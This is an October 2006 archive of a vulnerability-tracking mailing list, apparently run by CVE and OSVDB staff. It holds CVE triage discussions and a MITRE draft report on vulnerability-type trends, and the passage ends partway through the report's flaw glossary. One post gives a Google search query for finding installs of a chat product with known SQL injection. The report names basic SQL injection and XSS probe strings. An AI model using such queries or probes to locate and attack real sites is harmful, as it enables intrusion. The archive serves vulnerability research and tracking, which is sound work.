From jericho at attrition.org Sun Oct 1 17:55:00 2006
From: jericho at attrition.org (security curmudgeon)
Date: Sun, 1 Oct 2006 17:55:00 -0400 (EDT)
Subject: [VIM] Armorize Vulnerability Database

http://www.armorize.com/resources/vulnerability.php?Keyword=Armorize

Armorize Vulnerability Database is a comprehensive library that allows you
to effectively search web application vulnerability and automatically
illustrates your search result in real time.

-- Check out the chart below this.


From coley at mitre.org Mon Oct 2 18:23:55 2006
From: coley at mitre.org (Steven M. Christey)
Date: Mon, 2 Oct 2006 18:23:55 -0400 (EDT)
Subject: [VIM] yblog: distributable product
Message-ID: <200610022223.k92MNt9X015938@faron.mitre.org>

Ref: Yblog => Cross Site Scripting
http://www.securityfocus.com/archive/1/archive/1/447427/100/0/threaded

found some source here:

http://sourceforge.net/projects/y-blog/

With only a quick glance through the code, I was not able to verify the
researcher's claims. For example, "action" is only referenced a few
times in uss.php, apparently safely. However, I did not look
extensively for things like variable overwrite or dynamic variable
evaluation issues.

- Steve


From coley at linus.mitre.org Mon Oct 2 18:43:21 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Mon, 2 Oct 2006 18:43:21 -0400 (EDT)
Subject: [VIM] WebspotBlogging => 3.0 Remote File Include Vulnerabilities (fwd)

A Root3r_H3ll rediscovery...

---------- Forwarded message ----------
Date: Mon, 2 Oct 2006 18:42:28 -0400 (EDT)
From: Steven M. Christey
To: h4ck3riran at yahoo.com, bugtraq at securityfocus.com
Subject: Re: WebspotBlogging => 3.0 Remote File Include Vulnerabilities

These vectors were previously reported in June 2006 (CVE-2006-2860) by
Kacper in a milw0rm post (http://milw0rm.com/exploits/1871), for
version 3.0.1.

>> Www.Site.coM/[Path]/inc/mainheder.inc.php

This appears to be a mis-spelling of "mainheader.inc.php".
- Steve


From heinbockel at mitre.org Tue Oct 3 12:53:42 2006
From: heinbockel at mitre.org (Heinbockel, Bill)
Date: Tue, 3 Oct 2006 12:53:42 -0400
Subject: [VIM] Concerning CSRF in phpMyAdmin 2.9.0.1 (CVE-2006-5116)
Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC0136B20B@IMCSRV5.MITRE.ORG>

>-----Original Message-----
>From: Stefan Esser [sesser (at) hardened-php (dot) net]
>Sent: Tuesday, 3 October 2006 12:36
>To: Heinbockel, Bill
>Subject: Re: Question regarding the CSRF in phpMyAdmin
>
>Hello,
>
>> Regarding the advisory:
>> Advisory 07/2006: phpMyAdmin Multiple CSRF Vulnerabilities
>>
>> Is this the same issue mentioned by the phpMyAdmin changelog
>> for 2.9.1-rc1, which mentions "2006-09-27 ... libraries/common.lib.php,
>> /session.inc.php, /url_generating.lib.php: security fixes (announcement
>> will come later), thanks to Sebastian Mendel and Stefan Esser."
>>
>It is the same issue? Yes and no... The fixes in 2.9.1-rc1 were not
>fixing all issues I reported (correctly). It is still vulnerable to some
>of the attacks I found. After they released rc1 they decided to not call
>the next release 2.9.1 but to call it 2.9.0.1. I guess this is the
>reason for the confusion.
>
>However 2.9.1-rc1 is STILL vulnerable to some of the issues reported in
>my advisory.
>
>Stefan
>

The phpMyAdmin changelog issue was assigned CVE-2006-5116. Another CVE
will be published for the issues not addressed in the 2.9.1-rc1 release.

======================================================================
CVE-2006-5116

Multiple unspecified vulnerabilities in phpMyAdmin before 2.9.1-rc1 have
unspecified impact and attack vectors, related to (1)
libraries/common.lib.php, (2) session.inc.php, and (3)
url_generating.lib.php.

Ref: CONFIRM:http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.9.1-rc1.tar.gz?download
Ref: BID:20253
Ref: SECUNIA:22126


William Heinbockel
Infosec Engineer
The MITRE Corporation
202 Burlington Rd.
MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615


From coley at linus.mitre.org Tue Oct 3 13:15:07 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue, 3 Oct 2006 13:15:07 -0400 (EDT)
Subject: [VIM] About CVE-2005-4481 (dispute) (fwd)

FYI, I think this was already forwarded here or elsewhere, but just in
case.

- Steve

---------- Forwarded message ----------
Date: Tue, 03 Oct 2006 15:11:13 +0200
From: Jörgen Rydenius
To: cve at mitre.org
Cc: nvd at nist.gov
Subject: About CVE-2005-4481 (dispute)

Hi.

CVE-2005-4481 is concerned with "XSS vulnerability in Polopoly 9 and
earlier". I have some more information about this issue:

1. The XSS flaw described was only part of the custom implementation of
the http://www.polopoly.com/ site. It was never part of any version of
any Polopoly product, nor delivered to any of Polopoly's customers.

2. The XSS flaw that existed (the search form in the upper right corner)
on the www.polopoly.com site has been fixed.

3. When www.polopoly.com had the XSS flaw it was based on Polopoly 8.6.
Polopoly 9.x was never involved whatsoever in this issue. And as I said
earlier, the flaw was not part of Polopoly 8.6 either, it was only in
custom implementation code of the www.polopoly.com site.

4. The www.polopoly.com site is not personalized nor permission
controlled, so there was no information of any value to steal by
exploiting the XSS flaw.

Regards,
Jörgen Rydenius (Polopoly employee)

--
Jörgen Rydenius
Polopoly - Cultivating the information garden
Kungsgatan 88, SE-112 27 Stockholm, SWEDEN


From coley at mitre.org Tue Oct 3 20:49:50 2006
From: coley at mitre.org (Steven M. Christey)
Date: Tue, 3 Oct 2006 20:49:50 -0400 (EDT)
Subject: [VIM] Cool Cafe' product found - mostly
Message-ID: <200610040049.k940noFx012228@faron.mitre.org>

See CVE's below.

OSVDB:17349 and OSVDB:17350 had marked these issues as myth/fake,
saying there was no info on the product, and it might have been
site-specific.
I dug into this a little more, because morning wood was the researcher.
A couple inurl: queries later, and it looks like there's some product
*somewhere* that at least used to be distributed at coolcafe.ca (not
any more), that has been hacked by some defacers on in-the-wild sites.

Proper spelling: Cool Café! (by the way, has anybody figured out how
to handle all the different language/charsets/encodings in their
database? I just paste and pray)

Google search: inurl:"coolcafe/login.asp"

You can narrow it down a little more if you add "defaced" or "owned"
into your query.

It appears to be just a chat utility, no clear association with
restaurants besides its name.

- Steve

======================================================
Name: CVE-2005-2035
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2035
Acknowledged: yes advisory/yes followup/yes changelog/yes/unknown discloser-claimed/unknown vague/unknown/no disputed/no
Announced: 20050616
Flaw: sql-inject
Reference: FULLDISC:20050616 CoolCafe Chat SQL injection
Reference: URL:http://seclists.org/lists/fulldisclosure/2005/Jun/0205.html
Reference: MISC:http://exploitlabs.com/files/advisories/EXPL-A-2005-009-coolcafe.txt
Reference: OSVDB:17349
Reference: URL:http://www.osvdb.org/17349
Reference: SECTRACK:1014221
Reference: URL:http://securitytracker.com/id?1014221

SQL injection vulnerability in login.asp for Cool Cafe (Cool Café)
Chat 1.2.1 allows remote attackers to execute arbitrary SQL commands
via the password.

Analysis:
INCLUSION: at first glance, this does not appear to be a valid product,
but a Google search for inurl:"coolcafe/login.asp" yields a number of
results.
======================================================
Name: CVE-2005-2036
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2036
Acknowledged: yes advisory/yes followup/yes changelog/yes/unknown discloser-claimed/unknown vague/unknown/no disputed/no
Announced: 20050616
Flaw: form-field
Reference: FULLDISC:20050616 CoolCafe Chat SQL injection
Reference: URL:http://seclists.org/lists/fulldisclosure/2005/Jun/0205.html
Reference: MISC:http://exploitlabs.com/files/advisories/EXPL-A-2005-009-coolcafe.txt
Reference: OSVDB:17350
Reference: URL:http://www.osvdb.org/17350

modifyUser.asp in Cool Cafe (Cool Café) Chat 1.2.1 allows remote
attackers to obtain the administrator password and email address via a
modified nickname value.

Analysis:
INCLUSION: at first glance, this does not appear to be a valid product,
but a Google search for inurl:"coolcafe/login.asp" yields a number of
results.


From sullo at cirt.net Tue Oct 3 21:00:05 2006
From: sullo at cirt.net (Sullo)
Date: Tue, 03 Oct 2006 21:00:05 -0400
Subject: [VIM] Cool Cafe' product found - mostly
In-Reply-To: <200610040049.k940noFx012228@faron.mitre.org>
References: <200610040049.k940noFx012228@faron.mitre.org>
Message-ID: <45230795.2090505@cirt.net>

Steven M. Christey wrote:
> See CVE's below.
>
> OSVDB:17349 and OSVDB:17350 had marked these issues as myth/fake,
> saying there was no info on the product, and it might have been
> site-specific. I dug into this a little more, because morning wood
> was the researcher. A couple inurl: queries later, and it looks like
> there's some product *somewhere* that at least used to be distributed
> at coolcafe.ca (not any more),

archive.org has some mirrors of the old site
(http://web.archive.org/web/*/http://coolcafe.ca).

http://web.archive.org/web/20010607125917/www.coolcafe.ca/V3/index.asp
"Cool Café is a free ASP chat application that can be fully customized
to the look of your web site."


From jericho at attrition.org Tue Oct 3 21:01:40 2006
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 3 Oct 2006 21:01:40 -0400 (EDT)
Subject: [VIM] Cool Cafe' product found - mostly
In-Reply-To: <45230795.2090505@cirt.net>
References: <200610040049.k940noFx012228@faron.mitre.org>
 <45230795.2090505@cirt.net>

: > See CVE's below.
: >
: > OSVDB:17349 and OSVDB:17350 had marked these issues as myth/fake,
: > saying there was no info on the product, and it might have been
: > site-specific. I dug into this a little more, because morning wood
: > was the researcher. A couple inurl: queries later, and it looks like
: > there's some product *somewhere* that at least used to be distributed
: > at coolcafe.ca (not any more),
:
: archive.org has some mirrors of the old site
: (http://web.archive.org/web/*/http://coolcafe.ca).
:
: http://web.archive.org/web/20010607125917/www.coolcafe.ca/V3/index.asp
: "Cool Café is a free ASP chat application that can be fully customized
: to the look of your web site."

The night I dug into this, archive.org did not have any archives of the
site available...


From coley at linus.mitre.org Wed Oct 4 19:14:48 2006
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 4 Oct 2006 19:14:48 -0400 (EDT)
Subject: [VIM] Vulnerability Type Distributions in CVE

(note: this mailing list post should include an attachment with HTML
versions of the tables in this paper. The URL for the permanent web
page is given below.)

==========================================================
Vulnerability Type Distributions in CVE
==========================================================

Author: Steve Christey
Date: October 4, 2006
Document version: 1.0
URL: http://cwe.mitre.org/documents/vuln-trends.html

This is a draft report and does not represent an official position of
The MITRE Corporation.

Copyright (c) 2006, The MITRE Corporation. All rights reserved.
Permission is granted to redistribute this document if this paragraph
is not removed. This document is subject to change without notice.

=============================
===== Table of Contents =====
=============================

Introduction
Summary of Results
Data Sets
Trend Table Color Key
Table 1 Analysis: Overall Trends
Table 2 and 3 Analysis: OS vs. non-OS
Table 4 Analysis: Open and Closed Source
Possible Future Work
Notes on Potential Bias
(In)Frequently Asked Questions
Credits
References
Flaw Terminology
Table 1: Overall Results
Table 2: OS Vendors
Table 3: OS Vendors vs. Others
Table 4: Open and Closed Source (OS vendors)

========================
===== Introduction =====
========================

For the past 5 years, CVE has been tracking the types of errors that
lead to publicly reported vulnerabilities, and periodically reporting
trends on a limited scale. In support of the Common Weakness
Enumeration (CWE) project [1], and as a result of the interest in this
work as mentioned during the "Year of the web application: Hack & Data
from the Front lines" panel at the 5th Annual Cyber Security Executive
Summit in New York City on September 13, 2006, we have published a more
extensive analysis. An updated version will be released once 2006 is
complete.

The primary goal of this study is to better understand research trends
using publicly reported vulnerabilities. It should be noted that the
data is obtained from an uncontrolled population, i.e., decentralized
public reports from a research community with diverse goals and
interests, with an equally diverse set of vendors and developers. More
specialized, exhaustive, and repeatable methods could be devised to
evaluate software security. But until such methods reach maturity and
widespread acceptance, the overall state of software security can be
viewed through the lens of public reports.
==============================
===== Summary of Results =====
==============================

1) The total number of publicly reported web application
vulnerabilities has risen sharply, to the point where they have
overtaken buffer overflows. This is probably due to ease of detection
and exploitation of web vulnerabilities, combined with the
proliferation of low-grade software applications. In 2005 and 2006,
cross-site scripting (XSS) was number 1, and SQL injection was number
2. PHP remote file inclusion is number 3 in 2006; because it allows
arbitrary code execution on a vulnerable server, this is a worrisome
trend, although proper configuration is frequently enough to eliminate
it.

2) Buffer overflows are still the number 1 issue as reported in
operating system (OS) vendor advisories. XSS is still high in this
category, at number 2 in 2005 and number 3 in 2006, although other web
application vulnerabilities appear much less frequently.

3) Integer overflows, barely in the top 10 overall in the past few
years, are in the top 3 for OS vendor advisories. This might indicate
expert researcher interest in high-profile software.

4) There are noticeable differences in the types of vulnerabilities
being reported in open and closed source OS vendor advisories. These
merit further investigation because they might reflect important
differences in development, research, and disclosure practices.

5) The data is inconclusive regarding whether there is a concrete
improvement in overall software security. While there is a rise in
"new" vulnerability classes, the raw numbers for older classes have not
changed significantly. Further investigation is also required in this
area.

=====================
===== Data Sets =====
=====================

Three main data sets were used in this analysis.

OVERALL: this data set consists of all CVEs that were first publicly
reported in 2001 or later (earlier CVEs do not have the appropriate
fields filled out.)
CVE includes all types of software, whether from a major vendor or an
individual hobbyist programmer, as long as the associated vulnerability
has been reported by the developer or posted by a researcher or third
party to sources such as mailing lists and vulnerability databases. CVE
only includes distributable software, i.e., it does not include issues
that are reported for custom software in specific web sites. While CVE
data is incomplete, it is estimated that it is 80% complete relative to
all major mailing lists and vulnerability databases, with the likely
exception of data from 2003.

OS VENDOR: this data set identifies CVEs that are associated with
operating system (OS) vendor advisories, which would capture
vulnerabilities in the kernel, as well as applications that are
supported by the OS vendor. The data was limited to CVEs that have one
or more references from the following sources. For open source OS
vendors, the following sources were used: DEBIAN, FREEBSD,
MANDRAKE/MANDRIVA, NETBSD, OPENBSD, REDHAT, and SUSE. The closed source
OS vendors included: AIXAPAR, APPLE, CISCO, HP, MS, MSKB, SCO, SGI, SUN,
and SUNALERT. CVE does not have the internal data fields to support
more fine-grained analysis for major non-OS vendors.

OPEN/CLOSED SOURCE: open and closed source operating system (OS)
vendors were identified using the same methods and categories as
described in the "OS VENDOR" section. Because some closed source
vendors such as Apple have significant codebase overlap with open
source products, any overlapping CVEs were removed from the data set.
Both open and closed sets had at least 1700 vulnerabilities.

In each data set, vulnerabilities were not removed if they were marked
as "disputed." Many disputes are incorrect or unresolved.

=================================
===== Trend Table Color Key =====
=================================

In the HTML pages, the following color key is used for trend tables.
GRAY: used in comparisons to help visually separate one data set from
another

RED: a top 10 for that year

GREEN: during that year, the vulnerability's rank was at least 5 points
BELOW the average rank for that vulnerability

YELLOW: during that year, the vulnerability's rank was at least 5
points ABOVE the average rank for that vulnerability

So, green on the left indicates vulns with RISING popularity, as will
yellow on the right. Green on the right indicates vulns with FALLING
popularity, as will yellow on the left.

============================================
===== Table 1 Analysis: Overall Trends =====
============================================

The most notable trend is the sharp rise in public reports for
vulnerabilities that are specific to web applications. Buffer overflows
were number 1 year after year, but that changed in 2005 with the rise
of web application vulnerabilities, including cross-site scripting
(XSS), SQL injection, and remote file inclusion, although SQL injection
is not limited just to web applications. In fact, so far in 2006,
buffer overflows are only #4.

There are probably several contributing factors to this increase in web
vulnerabilities:

1) The most basic data manipulations for these vulnerabilities are very
simple to perform, e.g., "'" for SQL injection and "<script>" for XSS.
This makes it easy for beginning researchers to quickly test large
amounts of software.

2) There is a plethora of freely available web applications. Much of
the code is alpha or beta, written by inexperienced programmers with
easy-to-learn languages such as PHP, and distributed on high-traffic
sites. The applications might have a small or non-existent user base.
Such software is often rife with easy-to-find vulnerabilities, and it
is often a target for beginning researchers. The large number of these
"fish-in-a-barrel" applications is probably a major contributor to the
overall trends.
3) With XSS, every input has the potential to be an attack vector,
which does not occur with other vulnerability types. This leaves more
opportunity for a single mistake to occur in a program that otherwise
protects against XSS. SQL injection also has many potential attack
vectors.

4) Despite popular opinion that XSS is easily prevented, it has many
subtleties and variants. Even solid applications can have flaws in
them; consider non-standard browser behaviors that try to "fix"
malformed HTML, which might slip by a filter that uses regular
expressions. Finally, until early 2006, the PHP interpreter had a
vulnerability in which it did not quote error messages, but many
researchers only reported the surface-level "resultant" XSS instead of
figuring out whether there was a different "primary" vulnerability
that led to the error.

5) There is some evidence that over the past couple of years, web
defacers have taken an interest in performing and publishing their own
research. This is probably due to the ease of finding vulnerabilities,
combined with the presence of high-risk problems such as PHP file
inclusion, which can be used to remotely install powerful,
easily-available backdoor code. Based on customer posts to numerous
vendor forums, there is solid evidence that remote file inclusion is
regularly used to compromise web servers, which also helps to explain
its popularity.

Overall Trends: Other Interesting Results
-----------------------------------------

1) For 2006, the top 5 vulnerability types are responsible for 57% of
all CVEs. With over 35 vulnerability types used in this report, and
dozens more as currently identified in CWE, this shows how most public
reports concentrate only on a handful of vulnerability types.

2) PHP remote file inclusion (php-include) has been steadily gaining
ground since 2001, enough so that it is number 3 at this point in 2006.
See items (2) and (5) from the previous section for a possible
explanation.
3) Over the years, there has been a noticeable decline in shell
metacharacters, symbolic link following, and directory traversal. It
is unclear whether software is actually improving with respect to these
problems, or if they are not investigated as frequently.

4) Information leaks (infoleak) appear regularly. There are 2 main
reasons for the prominence: "information leak" is a more general class
than others (see CWE for more precise sub-categories), and when an
error message includes a full path, that is usually categorized as an
information leak, although it might be resultant from a separate
primary vulnerability.

5) The inability to handle malformed inputs (dos-malform), which
usually leads to a crash or hang, is also a general class.
Malformed-input vulnerabilities have not been studied as closely as
injection vulnerabilities, at least with respect to identifying the
root cause of the problem. Also, many reports do not specify how an
input is malformed. There are likely many cases in which a researcher
accidentally triggers a more serious vulnerability but does not perform
sufficient diagnosis to determine the primary issue. Finally, vendor
reports might only identify an issue as being related to "malformed
input," which obscures the primary cause.

6) As the percentage of buffer overflows has declined, there has been
an increase in related vulnerability types, including integer overflows
(int-overflow), signedness errors, and double frees (double-free).
These are still very low-percentage, probably due to their relative
newness and difficulty of detection compared to classic overflows. In
addition, these newly emerging vulnerability types might be labeled as
buffer overflows, since they often lead to buffer overflows, and the
"buffer overflow" term is used interchangeably for attack, cause, and
effect.
7) Other interesting web application vulnerabilities are webroot
(storage of sensitive files under the web document root), form-field
(web parameter tampering), upload of files with executable extensions
(e.g., file.php.gif), eval injection, and Cross-Site Request Forgery
(CSRF).

==================================================
===== Table 2 and 3 Analysis: OS vs. non-OS ======
==================================================

Given the increase in web application vulnerabilities and the
likelihood that it is partially due to researcher interest in software
with small user bases, an analysis was performed based solely on
advisories from operating system (OS) vendors. These advisories
frequently include the OS kernel and key applications that are
supported by the vendor. See the Data Sets section for more
information. Unfortunately, more precise data sets could not be
generated.

Table 2 provides the data for OS vendor advisories alone. Table 3
contrasts the OS vendor advisories with all other reported issues.

There are several notable results:

1) Integer overflows are heavily represented in OS vendor advisories,
rising to number 2 so far in 2006, even though they represent a small
percentage of vulnerabilities overall. This probably reflects growing
interest by expert researchers in finding integer overflows, along with
the tendency of expert researchers to evaluate widely deployed
software. The affected software ranges widely, including the kernel,
cryptographic modules, and multimedia file processors such as image
viewers and music players. After 2004, many of the reported issues
occur in libraries or common DLLs.

2) Buffer overflows are still #1. This is probably due to
under-representation of web applications in OS advisories, relative to
other CVEs. In addition, as related issues like integer overflows
increase, they might be detected or reported as buffer overflows, since
buffer overflows are frequently resultant from integer overflows.
3) XSS is still very common, even in OS advisories, and it appears with
the same frequency as integer overflows in 2006. An informal analysis
shows that the affected software includes web servers, web browsers,
email clients, administrative interfaces, and Wiki/CMS.

4) With the exception of XSS, there is a wide gulf between web-related
vulnerabilities in OS advisories and other issues. SQL injection is not
even in the top 10 for OS advisories, and PHP remote file inclusion is
practically nonexistent. Many other web-related vulnerabilities occupy
the bottom of the chart. For SQL injection, it is possible that most
OS-supported applications do not use databases, or aren't web
accessible. SQL injection vulnerabilities are not web-specific, but it
seems that they are rarely reported for non-web applications, so it is
possible that this reflects some researcher bias.

5) Directory traversal and format string vulnerabilities are frequently
reported at a higher rate in OS vendor advisories than elsewhere. The
reason is unclear, because these vulnerabilities are not restricted to
local attack vectors, so one might expect that they would also appear
regularly in web applications. However, it is likely that researchers
do not focus on format strings because they are rarely exploitable for
code execution in languages other than C. In the case of PHP, many PHP
functions are subject to both remote file inclusion and directory
traversal, and it might be that only the file inclusion is publicly
reported. (In fact, the overlap is so close that this sometimes causes
difficulties with classification).

6) In 2006 so far, more than a quarter (27%) of the OS vendor
advisories did not have sufficient details to actually classify the
vulnerability (type "unk"). This is in sharp contrast to the non-OS
issues, which comprise less than 8%.
However, because of the data sets in question, the non-OS CVEs will
include many non-coordinated disclosures that would, by their nature,
require more details. The next table will demonstrate that it is not
just closed source vendor advisories that omit sufficient details for
vulnerability classification.

7) The "top 5" and "top 10" vulnerabilities in each year are a much
smaller percentage of total vulnerabilities in OS vendor advisories
than non-OS issues. For example, in 2005, the top 5 totaled 29.4% for
OS issues, but 55% for non-OS. For OS issues, this suggests an
increasing diversity in the kinds of vulnerabilities being reported,
whereas for other issues, that diversity appears to be decreasing.
However, this could be another reflection of the domination of web
application vulnerabilities.

====================================================
===== Table 4 Analysis: Open and Closed Source =====
====================================================

Table 4 compares the vulnerability type distribution between the open
source and closed source operating system (OS) vendors. See the "Data
Sets" section for more information on how the data sets were
generated. As a reminder, CVEs that overlapped both open and closed
source sets were omitted.

IMPORTANT: it is inappropriate to use these results to compare the
relative security of open and closed source products, so the report
excludes raw numbers. Both sets had at least 1700 vulnerabilities.
There are too many variations in vendor advisory release policies,
possible differences in research techniques, and other factors cited
in [2]. And, simply put, there is too much potential for raw numbers
to be misused and misinterpreted.

However, some results pose interesting questions that merit more
in-depth investigation. These discrepancies might reflect differences
in vulnerability research techniques, researcher sub-communities,
vendor disclosure policies, and development practices and APIs, but
this has not been proven.
The research and vendor communities are encouraged to investigate the
underlying causes for these differences, which could provide lessons
learned for all software developers, open and closed source alike.

Some of the most notable results are:

1) The percentage of "unknown" vulnerabilities - those that could not
be classified due to lack of details - is significantly higher in
closed source than open source advisories, and 45% so far for 2006.
With such a wide discrepancy, it is difficult to know whether any of
the remaining results in this section are significant. It should be
noted that 10% of issues in open source advisories do not have enough
details to classify the problem.

2) Buffer overflows are number 1 for both open and closed, with roughly
the same percentage over the years.

3) Symbolic link vulnerabilities appear at a higher rate in open source
than closed source, although this might be due to the non-Unix OSes in
the data set. While Windows has "shortcuts" (.LNK) that are similar to
Unix links, they appear very rarely in Microsoft advisories, or for
Windows-based applications. It is not clear whether this is due to
under-research or API/development differences. The author recalls that
at least one Linux researcher appeared to concentrate on symbolic link
issues in 2004 and 2005, so researcher bias might also be a factor.

4) Malformed-input vulnerabilities appear more frequently in closed
source advisories than open source. This might be due to a lack of
details in closed source advisories. If an advisory mentions a problem
due to "malformed data," it might be assigned the dos-malform type.
Another factor might be due to black box techniques. It seems likely
that fuzzers and other tools would be used more frequently against
closed source products than open source, but this is not known.

5) XSS vulnerabilities appear more frequently in open source advisories
than closed, but this might be a reflection of vendor release policies
for advisories.
It seems that open source vendors are more likely to release advisories
for smaller packages.

6) Format string vulnerabilities appear more frequently in open source.
There are probably several factors. First, susceptible API library
calls such as printf() are easily found in source code using crude
methods, whereas binary reverse engineering techniques are not
conducted by many researchers (this might also be an explanation for
symbolic link issues). Second, many format string problems seem to
occur in rarely-triggered error conditions, which makes them more
difficult to test with black box methods. Perhaps most surprising: it
appears that, since 2003, the non-Unix closed source advisories have
not mentioned any format strings. It is not clear why there would be
such a radical difference, although it could be due to the lack of
details in those advisories.

7) Integer overflows have been roughly the same rank for open and
closed source. This is a curious similarity, since one might not expect
open and closed source analysis techniques to be equally capable in
finding these problems.

8) Another interesting example is in the use of default passwords. Over
the years, very few open source vendor advisories have mentioned
default passwords, whereas they appear with some regularity in closed
source advisories. It is not clear whether this is a difference in
shipping/configuration practices or vendor disclosure policies.

9) Shell metacharacter issues appear less frequently in non-Unix closed
source than other closed source advisories. This result was found by a
separate analysis; it is not evident in Table 4. This could be due to
usage patterns of API functions such as CreateProcess() for Windows,
and system() for Unix. This result is being reported because it is the
most concrete example of how API functions might play a role in
implementation-level vulnerabilities.
================================
===== Possible Future Work =====
================================

1) The vulnerability types could be tied to other CVE-normalized data, such as IDS, incident databases, or vulnerability scanning results. This could determine the types of vulnerabilities that are being actively exploited or detected in real-world enterprises.

2) More precise classification could be informative. Approximately 30% of CVEs have vulnerability types that cannot be described using the current classification scheme. Another 15% are "unknown" vulnerabilities whose disclosures do not have sufficient details to determine any vulnerability type, but this problem is unavoidable, since some vendors do not release these details.

3) A crude measure of researcher diversity might be possible by linking data to other vulnerability databases that record this information. This could be used to determine if the raw number of researchers is increasing (probably), how that rate is increasing relative to the number of vulnerabilities (unknown), and how many different bug types are found by the average researcher (probably fairly small). If such data is available, then a further breakdown could be performed based on professional researchers versus others.

4) More precise data sets could be identified, such as a cross-section of market leaders in various product categories, not just OS vendor advisories. CVE does not record this type of information.

===================================
===== Notes on Potential Bias =====
===================================

The diversity of both researchers and vendor disclosure practices introduces several unmeasurable biases, as described in more detail in [2].

In the overall results, 2003's issues have 20% with vulnerabilities that are "not specified" by the CVE analyst, which is inconsistent with statistics from other years. Many of these vulnerabilities were reviewed after this discovery, and they are in fact of type "other." This discrepancy has not been sufficiently explained, although it is probably at least partially due to the relative percentage of CVEs in OS vendor advisories to other CVEs, since 2003 was a low-output year for CVE and thus the concentration was in high-priority software.

Some vulnerability types are probably under-represented due to classification difficulty. For example, the "form-field" type (web parameter tampering) might occasionally get classified as an authentication error, depending on how the original researcher reports the issue.

==========================================
===== (In)Frequently Asked Questions =====
==========================================

1) Why aren't you giving out raw numbers for open vs. closed source?

Answer: we already said why. See paragraph 2 of the Table 4 analysis for a reminder.

2) Why are you releasing this report now, with incomplete 2006 data?

Answer: when MITRE mentioned the preliminary results at the Cyber Security Executive Summit on September 13, there was a lot more interest than we had originally anticipated. Subsequent discussion of the results might help us to provide a better report when 2006 is done.

3) How does this compare with the other summaries you've posted in the past? Why have the numbers and percentages changed for older years?

Answer: (1) we occasionally add CVEs for older issues, (2) some of the previously released summaries were cumulative instead of offering a year-by-year breakdown, and (3) eventually, as a new type of vulnerability is reported more frequently, the CVE project notices it enough to give it a name, or at least a type. Once we do that, we can go back and update the older CVEs that also had the issue. However, we often rely on keyword searches in CVE descriptions for doing these kinds of updates. The earliest reports of new vulnerability types probably don't get captured fully, because CVE descriptions frequently vary in the early days or months of a new vulnerability type. Most updates to these vulnerability trends trigger an informal review of the "other" vulnerabilities for the data set in order to update the type fields.

4) There are a lot more vulnerability types than what you've covered.

Answer: That's an observation, not a question. If a certain vulnerability type is not on the list, then it probably didn't appear frequently enough for the CVE project to track closely. There are several reasons: (1) the vulnerability type is selected from a large dropdown menu during CVE refinement, but also (2) our work in the Common Weakness Enumeration (CWE) is producing hundreds of vuln types, and we want that to become a little more stable before doing the next round of modifications to CVE data. Finally, (3) with approximately 3,500 vulnerabilities marked "other" or "not specified", it is cost-prohibitive to review each CVE when the set of categories is updated.

5) Why isn't my favorite web vulnerability here?

Answer: Many web vulnerabilities are difficult to classify because they are "multi-factor," i.e., they are composed of multiple bugs, weaknesses, and/or design limitations. Other web issues are really just specialized attacks that use other primary vulnerabilities. For example, most HTTP response splitting problems rely on CRLF injection, so they are classified under CRLF injection.

===================
===== Credits =====
===================

Large-scale trend analyses like this are not possible without the body of knowledge that has been formed by hundreds or thousands of researchers, from hobbyists to professionals.

Thanks to the following for substantive feedback on the initial draft, sometimes in the form of a question that required more investigation: Bill Heinbockel, Chris Wysopal, and Mark Curphey.
======================
===== References =====
======================

[1] CWE, http://cwe.mitre.org

[2] "Open Letter on the Interpretation of 'Vulnerability Statistics'"
    Bugtraq, Full-Disclosure
    January 5, 2006
    http://lists.grok.org.uk/pipermail/full-disclosure/2006-January/041028.html

============================
===== Flaw Terminology =====
============================

Type: auth
CWE: CWE-289, CWE-288, CWE-302, CWE-305, CWE-294, CWE-290, CWE-287, CWE-303
Description: Weak/bad authentication problem

Type: buf
CWE: CWE-119, CWE-120, others
Description: Buffer overflow

Type: CF
CWE: none
Description: General configuration problem, not perm or default

Type: crlf
CWE: CWE-93
Description: CRLF injection

Type: crypt
CWE: CWE-310, CWE-311, CWE-347, CWE-320, CWE-325
Description: Cryptographic error (poor design or implementation), including plaintext storage/transmission of sensitive information.

Type: CSRF
CWE: CWE-352
Description: Cross-Site Request Forgery (CSRF)

Type: default
CWE: N/A
Description: Insecure default configuration, e.g., passwords or permissions

Type: design
CWE: none
Description: Design problem, generally in protocols or programming languages. Since 2005, its use has been limited due to the highly general nature of this type.

Type: dos-flood
CWE: CWE-400
Description: DoS caused by flooding with a large number of *legitimately formatted* requests/etc.; normally DoS is a crash, or spending a lot more time on a task than it "should"

Type: dos-malform
CWE: CWE-238, CWE-234, CWE-166, CWE-230, many others
Description: DoS caused by malformed input

Type: dos-release
CWE: CWE-404
Description: DoS because system does not properly release resources

Type: dot
CWE: CWE-22, CWE-23, CWE-36
Description: Directory traversal (file access via ".." or variants)

Type: double-free
CWE: CWE-415
Description: Double-free vulnerability

Type: eval-inject
CWE: CWE-95
Description: Eval injection

Type: form-field
CWE: CWE-472
Description: CGI program inherently trusts form field that should not be modified (i.e., should be stored locally)

Type: format-string
CWE: CWE-134
Description: Format string vulnerability; user can inject format specifiers during string processing.

Type: infoleak
CWE: CWE-205, CWE-212, CWE-203, CWE-209, CWE-207, CWE-200, CWE-215, others
Description: Information leak by a product, which is not the result of another vulnerability; typically by design or by producing different "answers" that suggest the state; often related to configuration / permissions or error reporting/handling.

Type: int-overflow
CWE: CWE-190
Description: A numeric value can be incremented to the point where it overflows and begins at the minimum value, with security implications. Overlaps signedness errors.

Type: link
CWE: CWE-61, CWE-64
Description: Symbolic link following

Type: memleak
CWE: CWE-401
Description: Memory leak (doesn't free memory when it should); use this instead of dos-release

Type: metachar
CWE: CWE-78
Description: Unescaped shell metacharacters or other unquoted "special" char's; currently includes SQL injection but not XSS.

Type: msdos-device
CWE: CWE-67
Description: Problem due to file names with MS-DOS device names.

Type: not-specified
CWE: none
Description: The CVE analyst has not assigned a flaw type to the issue, typically similar to "other".

Type: other
CWE: none
Description: Other vulnerability; issue could not be described with an available type at the time of analysis.

Type: pass
CWE: CWE-259
Description: Default or hard-coded password

Type: perm
CWE: CWE-276
